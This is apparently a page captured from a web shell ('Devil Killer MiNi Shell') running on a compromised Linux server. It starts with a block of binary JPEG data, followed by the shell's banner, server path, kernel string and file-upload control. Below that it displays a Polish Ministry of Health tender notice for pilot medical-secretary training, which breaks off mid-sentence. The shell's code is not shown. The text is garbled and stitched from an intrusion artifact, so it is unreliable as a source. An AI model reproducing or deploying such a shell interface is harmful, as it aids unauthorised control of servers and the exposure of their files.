JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210715/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20210715/0011647204-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00116472 z dnia 2021-07-15</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Przeprowadzenie pilotażowych szkoleń do wykonywania pracy na stanowisku sekretarka/rz medyczna/y </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Ministerstwo Zdrowia</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000287987</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Miodowa 15</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Warszawa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">00-952</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL911 - Miasto Warszawa</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowieniapubliczne@mz.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://zamowienia-mz.ezamawiajacy.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - organ władzy publicznej - organ administracji rządowej (centralnej lub terenowej)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Zdrowie</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przeprowadzenie pilotażowych szkoleń do wykonywania pracy na stanowisku sekretarka/rz medyczna/y </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-bd9cfddb-e46e-11eb-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00116472</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">04</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-07-15</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00007434/06/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.27 Szkolenia do wykonywania pracy na stanowisku sekretarka/rz medyczna/y</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Zamówienie realizowane w ramach realizacji projektu nr POWR.05.02.00-00-0007/19 pn. „Opracowanie i pilotażowe wdrożenie modelu szkolenia kadr administracyjnych na potrzeby systemu ochrony zdrowia”, zwanego dalej ,,projektem’’, współfinansowanego ze środków Europejskiego Funduszu Społecznego w zakresie Programu Operacyjnego Wiedza Edukacja Rozwój 2014-2020. </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://zamowienia-mz.ezamawiajacy.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://zamowienia-mz.ezamawiajacy.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.	W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcą, w szczególności składanie ofert oraz oświadczeń, zawiadomień oraz przekazywanie informacji odbywa się elektronicznie. <br/>2.	Postępowanie prowadzone jest na Platformie pod adresem https://zamowienia-mz.ezamawiajacy.pl (dalej jako „Platforma”) i pod nazwą postępowania wskazaną w tytule SWZ.<br/>3.	Przeglądanie i pobieranie treści dokumentacji postępowania nie wymaga posiadania konta na Platformie ani logowania do Platformy.<br/>4.	Zgłoszenie do postępowania wymaga zalogowania Wykonawcy do Systemu na subdomenie Ministerstwa Zdrowia pod adresem pod adresem: https://zamowienia-mz.ezamawiajacy.pl lub https://oneplace.marketplanet.pl. <br/>5.	Wykonawca po wybraniu opcji „przystąp do postępowania” zostanie przekierowany do strony https://oneplace.marketplanet.pl, gdzie zostanie powiadomiony o możliwości zalogowania lub do założenia bezpłatnego konta. Wykonawca zakłada konto wykonując kroki procesu rejestracyjnego; podaje adres e-mail, ustanawia hasło, następnie powtarza hasło, wpisuje kod z obrazka, akceptuje regulamin, klika polecenie „zarejestruj się”. <br/>6.	Rejestracja Wykonawcy trwa maksymalnie do 2 dni roboczych. W związku z tym Zamawiający zaleca Wykonawcom uwzględnienie czasu niezbędnego na rejestrację w procesie złożenia Oferty w formie lub postaci elektronicznej. <br/>Szczegółowe wymagania techniczne i organizacyjne określono w SWZ Rozdział 10.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Na podstawie art. 13 lub 14 rozporządzenia Parlamentu Europejskiego i Rady (UE) nr 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych osobowych) <br/>(Dz. Urz. UE L 119 z 04.05.2016, str. 1, z późn. zm.), dalej ,,RODO’’, informuję, że: <br/>1.	Administratorem Pana danych osobowych jest minister właściwy do spraw rozwoju regionalnego, pełniący funkcję Instytucji Zarządzającej dla Programu Operacyjnego Wiedza Edukacja Rozwój 2014-2020, mający siedzibę przy ul. Świętokrzyskiej 12, 00-916 Warszawa.<br/>2.	Przetwarzanie Pana danych osobowych jest zgodne z prawem i spełnia warunki, o których mowa art. 6 ust. 1 lit. b oraz art. 9 ust. 2 lit. g RODO – dane osobowe są niezbędne dla realizacji Programu Operacyjnego Wiedza Edukacja Rozwój 2014-2020 (PO WER) na podstawie: <br/>a)	rozporządzenia Parlamentu Europejskiego i Rady (UE) nr 1303/2013 z dnia <br/>17 grudnia 2013 r. ustanawiającego wspólne przepisy dotyczące Europejskiego Funduszu Rozwoju Regionalnego, Europejskiego Funduszu Społecznego, Funduszu Spójności, Europejskiego Funduszu Rolnego na rzecz Rozwoju Obszarów Wiejskich oraz Europejskiego Funduszu Morskiego i Rybackiego oraz ustanawiającego przepisy ogólne dotyczące Europejskiego Funduszu Rozwoju Regionalnego, Europejskiego Funduszu Społecznego, Funduszu Spójności i Europejskiego Funduszu Morskiego i Rybackiego oraz uchylającego rozporządzenie Rady (WE) nr 1083/2006 (Dz. Urz. UE L 347 z 20.12.2013, str. 320, z późn. zm.),<br/>b)	rozporządzenia Parlamentu Europejskiego i Rady (UE) nr 1304/2013 z dnia <br/>17 grudnia 2013 r. w sprawie Europejskiego Funduszu Społecznego i uchylającego rozporządzenie Rady (WE) nr 1081/2006 (Dz. Urz. UE L 347 z 20.12.2013, str. 470, z późn. zm.),<br/>c)	ustawy z dnia 11 lipca 2014 r. o zasadach realizacji programów w zakresie polityki spójności finansowanych w perspektywie finansowej 2014–2020 (Dz. U. z 2020 r. poz. 818);<br/>d)	rozporządzenia wykonawczego Komisji (UE) nr 1011/2014 z dnia 22 września 2014 r. ustanawiającego szczegółowe przepisy wykonawcze do rozporządzenia Parlamentu Europejskiego i Rady (UE) nr 1303/2013 w odniesieniu do wzorów służących do przekazywania Komisji określonych informacji oraz szczegółowe przepisy dotyczące wymiany informacji między beneficjentami a instytucjami zarządzającymi, certyfikującymi, audytowymi i pośredniczącymi (Dz. Urz. UE L 286 z 30.09.2014, str. 1).<br/>3.	Pana dane osobowe będą przetwarzane w zbiorze: „Program Operacyjny Wiedza Edukacja Rozwój”.<br/>4.	Pana dane osobowe będą przetwarzane wyłącznie w celu realizacji projektu nr POWR.05.02.00-00-0007/19 pn. „Opracowanie i pilotażowe wdrożenie modelu szkolenia kadr administracyjnych na potrzeby systemu ochrony zdrowia’’, zwanego dalej ,,projektem’’ w szczególności potwierdzenia kwalifikowalności wydatków, udzielenia wsparcia, monitoringu, ewaluacji, kontroli, audytu i sprawozdawczości oraz działań informacyjno-promocyjnych w ramach PO WER.<br/>5.	Pana dane osobowe zostały powierzone do przetwarzania Instytucji Pośredniczącej - Ministrowi Zdrowia, Ministerstwo Zdrowia, ul. Miodowa 15, 00-952 Warszawa;, beneficjentowi realizującemu projekt - Departament Rozwoju Kadr Medycznych w Ministerstwie Zdrowia ul. Miodowa 15, 00-952 Warszawa. Pana dane osobowe mogą zostać przekazane podmiotom realizującym badania ewaluacyjne na zlecenie Instytucji Zarządzającej, Instytucji Pośredniczącej lub beneficjenta. Pana dane osobowe mogą zostać również powierzone specjalistycznym firmom, realizującym na zlecenie Instytucji Zarządzającej, Instytucji Pośredniczącej oraz beneficjenta kontrole i audyt w ramach PO WER 2014-2020. Pana dane osobowe mogą zostać powierzone podmiotom świadczącym na rzez Instytucji Zarządzającej usługi związane z obsługą i rozwojem systemów teleinformatycznych.<br/>Zapisy dotyczące RODO wskazano w SWZ Rozdział 3.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ADR.250.163.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest przeprowadzenie pilotażowych szkoleń do wykonywania pracy na stanowisku sekretarka/rz medyczna/y lub na innym stanowisku, na którym realizowane są zadania związane m. in. z prowadzeniem dokumentacji medycznej, w zakresie koordynacji administracji medycznej, w ramach zadania drugiego projektu POWR.05.02.00-00-0007/19 pn. „Opracowanie i pilotażowe wdrożenie modelu szkolenia kadr administracyjnych na potrzeby systemu ochrony zdrowia”. Pilotażowe szkolenia przeprowadzone będą w oparciu o opracowany przez zespół ekspertów model szkolenia, program szkolenia, skrypt szkoleniowy i test wiedzy.<br/>Celem szkolenia jest przygotowanie uczestnika do sprawnego i zgodnego z przepisami prawa i najlepszymi praktykami realizowania i koordynowania zadań administracyjnych w placówce medycznej, związanych z obsługą procesów medycznych i zarządczych, w oparciu o systemy informatyczne i informacyjne. W toku realizacji kursu kształtowana będzie wiedza i praktyczne umiejętności, które warunkują efektywne wykonywanie obowiązków na stanowisku pracy.<br/>Szczegółowy opis przedmiotu zamówienia stanowi załącznik nr 1 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80510000-2 - Usługi szkolenia specjalistycznego</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">80561000-4 - Usługi szkolenia w dziedzinie zdrowia</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-09-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Przeprowadzenie szkoleń w grupach o maksymalnej liczebności jednej grupy szkoleniowej wynoszącej 25 osób</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">7</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Dostęp do systemów/rejestrów</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">33</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 4)	zdolności technicznej lub zawodowej- Zamawiający uzna warunek za spełniony, jeżeli: <br/>Wykonawca zapewni kadrę dydaktyczną/szkoleniową do realizacji niniejszego zamówienia w ilości co najmniej 10 osób:<br/>•	Kadra szkoleniowa dla bloku I Prawo i organizacja ochrony zdrowia:<br/>Co najmniej jedna osoba, która:<br/>a)	posiada tytuł magistra w dziedzinie nauk medycznych i nauk o zdrowiu, <br/>b)	w okresie ostatnich 3 lat przed upływem terminu składania ofert prowadziła <br/>co najmniej 1 szkolenie, kurs lub zajęcia w ramach kształcenia na poziomie średnim albo w systemie szkolnictwa wyższego (stacjonarne lub on-line) dla minimum 25 uczestników,<br/>c)	posiada wiedzę z części bloku I programu szkolenia powierzonej <br/>do przeprowadzenia zajęć;<br/>oraz <br/>co najmniej jedna osoba, która:<br/>a)	posiada tytuł magistra w dziedzinie nauk społecznych, w tym w szczególności w zakresie prawa, ekonomii i finansów lub zarządzania i jakości, <br/>b)	w okresie ostatnich 3 lat przed upływem terminu składania ofert prowadziła <br/>co najmniej 1 szkolenie, kurs lub zajęcia w ramach kształcenia na poziomie średnim albo w systemie szkolnictwa wyższego (stacjonarne lub on-line) dla minimum 25 uczestników, <br/>c)	posiada wiedzę z części bloku I programu szkolenia powierzonej do przeprowadzenia zajęć;<br/><br/>•	Kadra szkoleniowa dla bloku II Warsztat podstawowych umiejętności organizacji pracy, w tym zarządzania:<br/>Co najmniej jedna osoba, która:<br/>a)	posiada tytuł magistra w zakresie zarządzania,<br/>b)	w okresie ostatnich 3 lat przed upływem terminu składania ofert prowadził <br/>co najmniej 1 szkolenie, kurs lub zajęcia w ramach kształcenia na poziomie średnim albo w systemie szkolnictwa wyższego (stacjonarne lub on-line) dla minimum 25 uczestników, <br/>c)	posiada wiedzę z części bloku II programu szkolenia powierzonej <br/>do przeprowadzenia zajęć;<br/>oraz<br/>co najmniej jedna osoba, która:<br/>a)	posiada tytuł magistra w zakresie zdrowia publicznego,<br/>b)	w okresie ostatnich 3 lat przed upływem terminu składania ofert prowadziła <br/>co najmniej 1 szkolenie, kurs lub zajęcia w ramach kształcenia na poziomie średnim albo w systemie szkolnictwa wyższego (stacjonarne lub on-line) dla minimum 25 uczestników, <br/>c)	posiada wiedzę z części bloku II programu szkolenia powierzonej <br/>do przeprowadzenia zajęć;<br/>oraz<br/>co najmniej jedna osoba, która:<br/>a)	posiada tytuł lekarza lub pielęgniarki,<br/>b)	posiada co najmniej 3-letni staż pracy w zawodzie,<br/>c)	posiada studia podyplomowe w zakresie zarządzania w systemie ochrony zdrowia lub doświadczenie w kierowaniu podmiotem leczniczym lub jednostką organizacyjną przedsiębiorstwa podmiotu leczniczego lub oddziału,<br/>d)	w okresie ostatnich 3 lat przed upływem terminu składania ofert prowadziła <br/>co najmniej 1 szkolenie, kurs lub zajęcia w ramach kształcenia na poziomie średnim albo w systemie szkolnictwa wyższego (stacjonarne lub on-line) dla minimum 25 uczestników lub brała czynny udział w krajowym lub zagranicznym kongresie, zjeździe, konferencji lub sympozjum naukowym w charakterze <br/>np. prelegenta,<br/>e)	posiada wiedzę z części bloku II programu szkolenia powierzonej <br/>do przeprowadzenia zajęć;<br/>oraz<br/>co najmniej jedna osoba, która:<br/>a)	posiada tytuł lekarza systemu lub pielęgniarki systemu lub ratownika medycznego lub nauczyciel posiadający przygotowanie do prowadzenia zajęć edukacyjnych z zakresu udzielania pierwszej pomocy,<br/>b)	w okresie ostatnich 3 lat przed upływem terminu składania ofert prowadziła <br/>co najmniej 1 szkolenie z zakresu udzielania pierwszej pomocy dla minimum <br/>25 uczestników, <br/>c)	posiada wiedzę z części bloku II programu szkolenia powierzonej do przeprowadzenia zajęć;<br/><br/>•	Kadra szkoleniowa dla bloku III Dokumentacja medyczna:<br/>Co najmniej jedna osoba, która:<br/>a)	posiada tytuł lekarza lub lekarza dentysty lub pielęgniarki lub położnej lub magistra prawa,<br/>b)	posiada co najmniej 3-letni staż pracy w zawodzie,<br/>c)	w okresie ostatnich 3 lat przed upływem terminu składania ofert prowadził <br/>co najmniej 1 szkolenie, kurs lub zajęcia w ramach kształcenia na poziomie średnim albo w systemie szkolnictwa wyższego (stacjonarne lub on-line) dla minimum 25 uczestników lub brała czynny udział w krajowym lub zagranicznym kongresie, zjeździe, konferencji lub sympozjum naukowym w charakterze <br/>np. prelegenta,<br/>e)	posiada wiedzę w zakresie, o którym mowa w bloku III programu szkolenia.<br/><br/>•	Kadra szkoleniowa dla bloku IV Praktyka wykorzystania systemów informatycznych i informacyjnych, wspierających proces koordynacji i integracji opieki nakierowanej na wysoką wartość zdrowotną:<br/>Co najmniej jedna osoba, która:<br/>a)	posiada wiedzę w zakresie funkcjonowania systemów bazodanowych, rejestrów i usług, o których mowa w bloku IV programu szkolenia, takich jak <br/>np. Elektroniczna Weryfikacja Uprawnień Świadczeniobiorców (eWUŚ), <br/>AP-KOLCE, Portal świadczeniodawcy/ System Zarządzania Obiegiem Informacji (SZOI), e-Recepta, e-Zwolnienie, e-Skierowanie,<br/>b)	posiada wiedzę w zakresie kodowania i rozliczania świadczeń oraz statystyki medycznej,<br/>c)	w okresie ostatnich 3 lat przed upływem terminu składania ofert prowadził <br/>co najmniej 1 szkolenie, kurs lub zajęcia w ramach kształcenia na poziomie średnim albo w systemie szkolnictwa wyższego (stacjonarne lub on-line) dla minimum 25 uczestników; <br/>lub<br/>co najmniej dwie osoby, z których każda spełnia wymóg określony w lit. c oraz jedna spełnia wymóg określony w lit. a, a druga spełnia wymóg określony w lit. b;<br/>oraz <br/>co najmniej jedna osoba, która:<br/>a)	posiada tytuł lekarza lub pielęgniarki,<br/>b)	posiada co najmniej 3-letni staż pracy w zawodzie,<br/>c)	w okresie ostatnich 3 lat przed upływem terminu składania ofert prowadził <br/>co najmniej 1 szkolenie, kurs lub zajęcia w ramach kształcenia na poziomie średnim albo w systemie szkolnictwa wyższego (stacjonarne lub on-line) dla minimum 25 uczestników lub brała czynny udział w krajowym lub zagranicznym kongresie, zjeździe, konferencji lub sympozjum naukowym w charakterze <br/>np. prelegenta,<br/>d)	posiada wiedzę z części bloku IV programu szkolenia powierzonej <br/>do przeprowadzenia zajęć.<br/><br/>•	Kadra szkoleniowa dla bloku V Warsztat umiejętności psychologicznych <br/>i społecznych:<br/>Co najmniej jedna osoba, która:<br/>a)	posiada tytuł magistra w zakresie psychologii,<br/>b)	posiada wiedzę w zakresie, o którym mowa w bloku V programu szkolenia,<br/>c)	w okresie ostatnich 3 lat przed upływem terminu składania ofert prowadziła <br/>co najmniej 1 szkolenie z zakresu kompetencji miękkich dla minimum <br/>25 uczestników, <br/>d)	posiada co najmniej roczne doświadczenie pracy w zawodzie w podmiocie leczniczym.<br/>lub<br/>co najmniej dwie osoby, z których każda spełnia wymóg określony w lit. a i b oraz jedna spełnia wymóg określony w lit. c, a druga spełnia wymóg określony w lit. d. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">2)	oświadczenia wykonawcy, w zakresie art. 108 ust. 1 pkt 5 Ustawy PZP, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2020 r. poz. 1076 i 1086), z innym wykonawcą, który złożył odrębną 